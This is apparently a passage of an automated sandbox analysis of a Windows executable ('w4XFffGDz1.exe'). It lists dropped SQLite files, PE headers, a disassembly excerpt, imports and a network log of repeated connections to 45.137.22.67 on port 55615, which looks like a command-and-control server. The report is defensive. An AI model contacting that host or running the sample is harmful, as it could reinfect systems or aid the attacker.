                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):51200
                      Entropy (8bit):0.8746135976761988
                      Encrypted:false
                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                      Category:dropped
                      Size (bytes):40960
                      Entropy (8bit):0.8553638852307782
                      Encrypted:false
                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                      MD5:28222628A3465C5F0D4B28F70F97F482
                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                      Malicious:false
                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                      Category:dropped
                      Size (bytes):106496
                      Entropy (8bit):1.136413900497188
                      Encrypted:false
                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                      MD5:429F49156428FD53EB06FC82088FD324
                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                      Malicious:false
                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      Process:C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                      Category:dropped
                      Size (bytes):196608
                      Entropy (8bit):1.121297215059106
                      Encrypted:false
                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                      MD5:D87270D0039ED3A5A72E7082EA71E305
                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                      Malicious:false
                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.781604734274106
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:w4XFffGDz1.exe
                      File size:920'266 bytes
                      MD5:2185ecde5380054ad075b7a25ae0ea51
                      SHA1:caa1b832574fc3050af5f97b6deabc21398b5c47
                      SHA256:e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
                      SHA512:f31d6c4fc0b4533c0538975518a1ff703c9a62ffdb072570942245725d375b9ef27f0d65a37e3ed07cd52a11def9893c8c3e7d0edc884c5c9b602af61ad8e211
                      SSDEEP:24576:bCdL4E+j8SmRREbtuLD4DIvu18fplg+zQWxu5y0:bcL4/ruqbtuLMDQh58
                      TLSH:6E15122277D58832C2F322371975A3925A3CB8715F238ACB93E429ADEF359C19931753
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............y...y...y....~..y....|.!y....}..y..+.r..y..+....y..+....y..+....y.......y.......y...y...x..%....y..%....y..%.p..y..%....y.
                      Icon Hash:3570b480858580c5
                      Entrypoint:0x41d000
                      Entrypoint Section:.text
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Time Stamp:0x65DC537F [Mon Feb 26 09:01:51 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:5
                      OS Version Minor:1
                      File Version Major:5
                      File Version Minor:1
                      Subsystem Version Major:5
                      Subsystem Version Minor:1
                      Import Hash:10b73c5f7fc148e21f974da703236659
                      Instruction
                      call 00007F0D08DBDC21h
                      jmp 00007F0D08DBD58Dh
                      int3
                      int3
                      int3
                      int3
                      int3
                      int3
                      push ecx
                      lea ecx, dword ptr [esp+08h]
                      sub ecx, eax
                      and ecx, 0Fh
                      add eax, ecx
                      sbb ecx, ecx
                      or eax, ecx
                      pop ecx
                      jmp 00007F0D08DBCCEFh
                      push ecx
                      lea ecx, dword ptr [esp+08h]
                      sub ecx, eax
                      and ecx, 07h
                      add eax, ecx
                      sbb ecx, ecx
                      or eax, ecx
                      pop ecx
                      jmp 00007F0D08DBCCD9h
                      push ebp
                      mov ebp, esp
                      sub esp, 0Ch
                      lea ecx, dword ptr [ebp-0Ch]
                      call 00007F0D08DBC711h
                      push 0043BF68h
                      lea eax, dword ptr [ebp-0Ch]
                      push eax
                      call 00007F0D08DBE447h
                      int3
                      jmp 00007F0D08DC3D4Ch
                      push ebp
                      mov ebp, esp
                      and dword ptr [0045B89Ch], 00000000h
                      sub esp, 24h
                      or dword ptr [0043E770h], 01h
                      push 0000000Ah
                      call dword ptr [0043218Ch]
                      test eax, eax
                      je 00007F0D08DBD8C2h
                      and dword ptr [ebp-10h], 00000000h
                      xor eax, eax
                      push ebx
                      push esi
                      push edi
                      xor ecx, ecx
                      lea edi, dword ptr [ebp-24h]
                      push ebx
                      cpuid
                      mov esi, ebx
                      pop ebx
                      nop
                      mov dword ptr [edi], eax
                      mov dword ptr [edi+04h], esi
                      mov dword ptr [edi+08h], ecx
                      xor ecx, ecx
                      mov dword ptr [edi+0Ch], edx
                      mov eax, dword ptr [ebp-24h]
                      mov edi, dword ptr [ebp-20h]
                      mov dword ptr [ebp-0Ch], eax
                      xor edi, 756E6547h
                      mov eax, dword ptr [ebp-18h]
                      xor eax, 49656E69h
                      mov dword ptr [ebp-04h], eax
                      mov eax, dword ptr [ebp-1Ch]
                      xor eax, 6C65746Eh
                      mov dword ptr [ebp+00h], eax
                      Programming Language:
                      • [ C ] VS2008 SP1 build 30729
                      • [IMP] VS2008 SP1 build 30729
                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x3cef00x34.rdata
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3cf240x50.rdata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x5d0000x62f8.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x640000x2f38.reloc
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x3a0200x54.rdata
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x3a0800x18.rdata
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x346f80x40.rdata
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x320000x24c.rdata
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3c4fc0x100.rdata
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      .text0x10000x3023c0x30400eab8c49347b2363b3fdd36257b1df951False0.5767132852979274data6.682129404058095IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      .rdata0x320000xbc340xbe00e5f2fdc4aee2f1a0726781d86b4f8c02False0.4407483552631579data5.126576177856284IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .data0x3e0000x1df780x120094ebd057e10782ee3aa0d3ba58c1a1bfFalse0.3856336805555556DOS executable (block device driver w{\362ko\3050)3.9129841433728263IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .didat0x5c0000x17c0x200f6f8a7d940bc508fbb3b807359e5a063False0.42578125data3.261134286324671IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x5d0000x62f80x6400274f8184ed0865c3a4e3309a06e7038dFalse0.6695703125data6.732052947212191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                      .reloc0x640000x2f380x300083735fea8ebd9a3faee82aa0e6812001False0.7744140625data6.687384285279319IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      PNG0x5d5540xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                      PNG0x5e09c0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                      RT_ICON0x5f6480x162cPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.906800563777308
                      RT_DIALOG0x60c740x286dataEnglishUnited States0.5092879256965944
                      RT_DIALOG0x60efc0x13adataEnglishUnited States0.60828025477707
                      RT_DIALOG0x610380xecdataEnglishUnited States0.6991525423728814
                      RT_DIALOG0x611240x12edataEnglishUnited States0.5927152317880795
                      RT_DIALOG0x612540x338dataEnglishUnited States0.45145631067961167
                      RT_DIALOG0x6158c0x252dataEnglishUnited States0.5757575757575758
                      RT_STRING0x617e00x1e2dataEnglishUnited States0.3900414937759336
                      RT_STRING0x619c40x1ccdataEnglishUnited States0.4282608695652174
                      RT_STRING0x61b900x1b8dataEnglishUnited States0.45681818181818185
                      RT_STRING0x61d480x146dataEnglishUnited States0.5153374233128835
                      RT_STRING0x61e900x46cdataEnglishUnited States0.3454063604240283
                      RT_STRING0x622fc0x166dataEnglishUnited States0.49162011173184356
                      RT_STRING0x624640x152dataEnglishUnited States0.5059171597633136
                      RT_STRING0x625b80x10adataEnglishUnited States0.49624060150375937
                      RT_STRING0x626c40xbcdataEnglishUnited States0.6329787234042553
                      RT_STRING0x627800x1c0dataEnglishUnited States0.5178571428571429
                      RT_STRING0x629400x250dataEnglishUnited States0.44256756756756754
                      RT_GROUP_ICON0x62b900x14data1.05
                      RT_MANIFEST0x62ba40x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.3957333333333333
                      DLLImport
                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileTime, CloseHandle, CreateFileW, GetCurrentProcessId, CreateDirectoryW, RemoveDirectoryW, SetFileAttributesW, GetFileAttributesW, DeleteFileW, MoveFileW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetCurrentProcess, GetExitCodeProcess, WaitForSingleObject, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapReAlloc, HeapSize, SetStdHandle, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, SetEvent, ResetEvent, WaitForSingleObjectEx, CreateEventW, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
                      OLEAUT32.dllVariantClear, SysFreeString, SysAllocString
                      gdiplus.dllGdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdiplusShutdown, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc
                      Language of compilation systemCountry where language is spokenMap
                      EnglishUnited States
                      TimestampSource PortDest PortSource IPDest IP
                      Jun 15, 2024 20:22:13.592211962 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:13.597270966 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:13.597446918 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:13.614931107 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:13.619968891 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:13.962301016 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:13.968107939 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:14.436089039 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:14.477663040 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:19.484477043 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:19.484569073 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:19.489763975 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.489794970 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746203899 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746267080 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746320963 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746330023 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:19.746356964 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746387005 CEST556154971045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:19.746412992 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:19.790283918 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:20.549530029 CEST4971855615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:20.554758072 CEST556154971845.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:20.554884911 CEST4971855615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:20.564523935 CEST4971855615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:20.569586039 CEST556154971845.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:20.915374994 CEST4971855615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:20.920666933 CEST556154971845.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:21.384052038 CEST556154971845.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:21.430783987 CEST4971855615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.916909933 CEST4971055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.917320013 CEST4972055615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:22.922207117 CEST556154972045.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:22.922521114 CEST4972055615192.168.2.545.137.22.67
